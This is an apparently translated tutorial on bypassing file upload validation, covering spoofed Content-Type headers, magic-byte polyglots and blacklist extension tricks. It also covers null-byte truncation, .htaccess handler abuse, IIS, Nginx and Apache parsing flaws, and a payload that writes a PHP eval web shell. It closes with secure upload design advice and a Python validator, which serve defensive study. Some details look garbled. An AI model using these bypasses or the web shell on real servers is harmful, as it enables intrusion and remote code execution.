File Upload

File uploads are checked in several ways. Broadly, the checks split into client-side and server-side verification, and each of these is further refined into checks on the file extension, file size, and so on.

Client-side validation: as the name suggests, the check runs in the user's browser as a piece of JavaScript code.

  How to recognise it: select the image to upload; if a file error is shown before you have clicked confirm, the check ran in the browser, and no request has been sent at that point.

  Bypass methods:

  1. Disable JavaScript in the browser, which cancels the check.
  2. Intercept and modify the request with Burp.
   First rename the Trojan file's extension to jpg, capture the upload request with Burp Suite, then change the jpg in the captured request to php.

Server-side verification
  1. Content-Type field verification (file type verification)
   The Content-Type value is set by the client from the uploaded file's extension, so it can be rewritten in an intercepted request.

Changing the Content-Type field to image/gif bypasses this check.
2. File header verification
This can be done with regular-expression matches that check whether the file header matches the expected type. A few common file header correspondences:
(1) .JPEG; .JPE; .JPG, "JPGGraphic File"
(2) .gif, "GIF 89A"
(3) .zip, "Zip Compressed"
(4) .doc; .xls; .xlt; .ppt; .apr, "MS Compound Document v1 or Lotus Approach APRfile"

File header bypass
The file header information is prepended to the Trojan content, giving a structure somewhat like the following:
GIF89a<?php phpinfo(); ?>
3. Extension verification
MIME verification
MIME (Multipurpose Internet Mail Extensions) types. A MIME type associates a file extension with the application that should open it; when a file with that extension is accessed, the browser automatically opens it with the designated application. It is mostly used to declare client-defined file types and how media files should be opened.
It is an Internet standard that extends the e-mail standard to support:
text in non-ASCII characters; attachments in non-text formats (binary, sound, image, etc.); message bodies consisting of multiple parts; and header information containing non-ASCII characters.
The standard is defined in RFC 2045, RFC 2046, RFC 2047, RFC 2048, RFC 2049 and related RFCs. MIME improves on RFC 2822 (which evolved from RFC 822), under which the e-mail standard did not allow characters outside the 7-bit ASCII character set in mail messages. Because of that restriction, messages in non-English characters and non-text content such as binary files, images and sound could not originally be transmitted by e-mail; MIME makes this possible by specifying a symbolic method for representing various data types. The MIME framework is also used in the HTTP protocol on the World Wide Web, where the standard has been extended into Internet media types.
The role of MIME
MIME lets client software distinguish different kinds of data. For example, web browsers use MIME types to determine whether a file is a GIF image or a printable PostScript file. Web servers use MIME to specify the type of data they send, and web clients use MIME to specify the type of data they expect to receive.
A plain text mail message consists of a header part (To:, From:, Subject:, etc.) and a body part (Hello Mr. ..., etc.). A MIME-compliant message naturally also contains a header. The parts of the message are called MIME segments, and each segment is prefixed with its own special header. MIME mail is simply an extension of RFC 822 mail, though it has its own set of RFC specifications.
Header fields: by position in the mail packet, MIME headers are divided into the MIME message header and MIME segment headers. (The MIME message header is the header of the whole message; a MIME segment header is the header of an individual MIME segment.)
Common MIME types

MIME type checking
This generally inspects the first ten bytes of the content to determine the file type, and then checks the extension.
File extension bypass
Premise: blacklist verification
Blacklist detection: typically a dedicated blacklist file lists the common dangerous script extensions.
Bypass methods:
(1) Look for extensions missing from the blacklist, such as asa and cer.
(2) There may be case-sensitivity bypasses, such as aSp and pHp.
Extensions that can be parsed:
jsp jspx jspf
asp asa cer aspx
4. Combining with file inclusion vulnerabilities
Premise: the verification rule only checks whether the content of files with the asp/php/jsp extension is a Trojan.
Bypass method (taking php as an example; this vulnerability mainly exists in PHP):
(1) First upload a file with the txt extension whose content is the Trojan; because of its extension, its content is not checked.
(2) Then upload a .php file whose content is an include of the uploaded txt file's path.
At this point the php file pulls in the content of the txt file, thereby bypassing the verification.
(2) Case of the extension under Linux
Under Linux, if an uploaded php file is not parsed, try uploading it with the extension pHp.
5. Editor vulnerabilities
(1) CMS vulnerabilities: upload vulnerabilities present in different CMSs, such as JCMS, can be used to bypass the checks.
(2) Editor vulnerabilities: editors such as FCK and ewebeditor have their own upload vulnerabilities that can be used to bypass the checks.
The vulnerabilities in these two areas will be summarized separately later; this topic ends here.
Combining with other rules
(1) 0x00 truncation: caused by a logic flaw in how the path is assembled; it usually exists where the upload file path is constructed.
test.php(0x00).jpg
test.php%00.jpg
If the path is path/upload/1.php(0x00) and the file name is 1.jpg, the combined result is /upload/1.php(0x00)/1.jpg.
6. Bypassing blacklist-type detection (server side)
The dangerous extensions are written into a file, and uploads with those extensions are refused.
Extension name bypass:
case combinations such as pHp and PhP; variant extensions such as php1, php2, php3, php4, php5.
Unlisted extension bypass:
cer, ashx, asa, cdx, htr.
Special-character bypass (characters the blacklist may miss):
change a.asp to a.asp_
0x00 truncation bypass:
upload 1.php.jpg, capture it in Burp and change it to 1.php%00.jpg, or in the hex view change the 20 (space) to 00; when the name is parsed, everything after the null byte is ignored.
Or use upload/1.asp(space)/upload and change hex 20 to 00 to get the upload through.
Apache parsing bypass:
help.asp. 134.×2: Apache tries to parse from front to back until it encounters an extension it knows.
Double extension parsing bypass:
if Apache's conf still has AddHandler php5-script .php uncommented,
the file name 1.php.jpg is executed as php.
.htaccess file attack:
upload a custom .htaccess with the following content
<FilesMatch "aaa">
SetHandler application/x-httpd-php
</FilesMatch>
Then upload a file named aaa, with no extension, into the same directory, with the one-line Trojan as its content; at this point the bypass succeeds.

7. Bypassing whitelist-type detection (server side)

Parsing vulnerability bypasses
IIS 6.0 parsing bypass:
Directory bypass:
IIS 6.0 checks and parses by directory path, so a file name of the form "*.asp/xxx.jpg" is also parsed as asp.
Capture the request in Burp; in the part Content-Disposition: form-data; name="path", change the original upload/ to upload/1.asp/, and change filename="yijuhua.asp" to filename="yijuhua.asp/1.jpg".
Or create a folder a.php and put a one-line-Trojan image 1.jpg in it; a.php/1.jpg is then executed as php.
File bypass:
when /aaa.php;xxx.jpg is requested, the server looks for "." from the start of the name and gets .php;xxx.jpg;
it then looks for ";" and, if present, truncates the content there, so /aaa.php;xxx.jpg is parsed as /aaa.php. The following constructions also bypass the check: a.php;.jpg and a.php;jpg are executed as php.
IIS 7.0/7.5 parsing bypass:
upload a file 1.jpg
content: <?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
then visit 1.jpg/.php; this writes a Trojan shell.php in the same directory.
Nginx<8.0.3 parsing bypass:
upload 1.jpg and modify it in Burp to 1.jpg%00.php; the null byte gets the upload through.
Apache parsing bypass:
a.php.x1.x2: Apache tries to parse from front to back until it encounters an extension it recognizes.
.htaccess file attack: bypass with a custom .htaccess
<FilesMatch "aaa">
SetHandler application/x-httpd-php
</FilesMatch>
In the same directory, upload a file named aaa without an extension whose content is "aaa" followed by the one-line Trojan; the bypass then succeeds.
8. Bypassing automatic rewriting of the extension:

When php is uploaded, the server automatically rewrites the extension to gif.
Capture the request in Burp and change 1.php to 1.pphphp; the check is bypassed.
9. Double file upload breakthrough
Added by myself; I saw this method in an article by an expert. I don't know what the principle is, but I use it often.
My personal understanding is that two upload ports upload files separately, and the server only filters one of them.
I prefer to copy the upload module by editing the HTML, so that there are two upload points~

 


Design a secure file upload function
1. Make the file upload directory non-executable.
2. Determine the file type: the whitelist method is strongly recommended. For images, a compression or resize function can additionally be applied, which destroys any HTML code the image may contain while the image is processed.
3. Rewrite the file name and file path with random values: first, the file cannot be directly addressed after upload; second, files such as shell.php.rar.rar and crossdomain.xml are neutralized by the renaming.
4. Serve the file server from a separate domain: because of the browser's same-origin policy, a series of client-side attacks, such as uploading crossdomain.xml or an XSS payload containing JavaScript, are defeated.
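The four design points above, together with the file header and extension checks discussed earlier, can be combined into one server-side upload gate. The following is an added example written for this page, not code from the original post: the ALLOWED table, the SCRIPT_MARKERS heuristic and the helper names (normalize_name, validate_upload, classify, store_upload) are my own constructions. It also shows why the layers are needed: the header check alone accepts the GIF89a<?php phpinfo(); ?> polyglot from the file header bypass section, and only the random rename plus a non-executable upload directory make that file harmless.

```python
import os
import re
import secrets
import tempfile

# Added example, not code from the original post. Whitelist of allowed
# extensions -> magic bytes the content must start with (table constructed here).
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
}

# Markers of embedded code; a heuristic added here, not from the page.
SCRIPT_MARKERS = (b"<?", b"<%", b"<script")


class UploadRejected(Exception):
    pass


def normalize_name(filename):
    """Reduce the client-supplied name to a bare base name, rejecting the tricks
    discussed above: null bytes / %00, semicolons (a.php;.jpg) and trailing
    dots, spaces or underscores (a.asp_)."""
    if "\x00" in filename or "%00" in filename:
        raise UploadRejected("null byte")
    # Drop any path the client sent (upload/1.asp/1.jpg): the server picks the directory.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    if ";" in base:
        raise UploadRejected("semicolon")
    base = base.rstrip(" ._")
    if "." not in base or base.startswith("."):
        raise UploadRejected("no usable extension")
    return base


def extension_of(name):
    # Lower-cased so pHp/PhP compare equal; the last extension is checked.
    return name.rsplit(".", 1)[1].lower()


def validate_upload(filename, content):
    """Return the whitelisted extension or raise UploadRejected. The client's
    Content-Type header is deliberately ignored: it is attacker-controlled."""
    name = normalize_name(filename)
    ext = extension_of(name)
    if ext not in ALLOWED:
        raise UploadRejected("extension not whitelisted")
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected("header does not match extension")
    return ext


def contains_script_markers(content):
    """Secondary heuristic only; re-encoding the image (resize/compress), as the
    design list recommends, is the robust way to strip embedded code."""
    lowered = content.lower()
    return any(marker in lowered for marker in SCRIPT_MARKERS)


def classify(filename, content):
    """Return 'accepted:<ext>' or 'rejected:<reason>' for easy inspection."""
    try:
        return "accepted:" + validate_upload(filename, content)
    except UploadRejected as exc:
        return "rejected:" + str(exc)


def store_upload(filename, content, upload_dir=None):
    """Validate, then write under a server-chosen random name (design item 3).
    upload_dir must be served without any script handler (design item 1)."""
    ext = validate_upload(filename, content)
    if upload_dir is None:
        upload_dir = tempfile.mkdtemp(prefix="uploads_")
    random_name = f"{secrets.token_hex(16)}.{ext}"
    with open(os.path.join(upload_dir, random_name), "wb") as fh:
        fh.write(content)
    return random_name


def is_random_name(name):
    return re.fullmatch(r"[0-9a-f]{32}\.(jpg|jpeg|gif|png)", name) is not None


# Constructed sample uploads, not real files.
REAL_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
POLYGLOT_GIF = b"GIF89a<?php phpinfo(); ?>"  # structure shown on the page

if __name__ == "__main__":
    samples = [("cat.jpg", REAL_JPEG), ("shell.pHp", b"<?php"),
               ("1.php%00.jpg", REAL_JPEG), ("a.asp;.jpg", REAL_JPEG),
               ("1.php.jpg", POLYGLOT_GIF), ("1.php.jpg", REAL_JPEG),
               ("x.gif", POLYGLOT_GIF)]
    for name, data in samples:
        print(name, "->", classify(name, data),
              "| script markers:", contains_script_markers(data))
    print("stored as", store_upload("1.php.jpg", REAL_JPEG))
```

Note that 1.php.jpg with a genuine JPEG header is accepted: the whitelist keys on the last extension, and the random rename then removes the .php segment entirely, so the Apache double-extension handler case cannot apply to the stored file. The polyglot x.gif is also accepted by the header check, which is exactly why the non-executable directory, the rename and image re-encoding are listed as separate defences rather than relying on the header alone.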

 
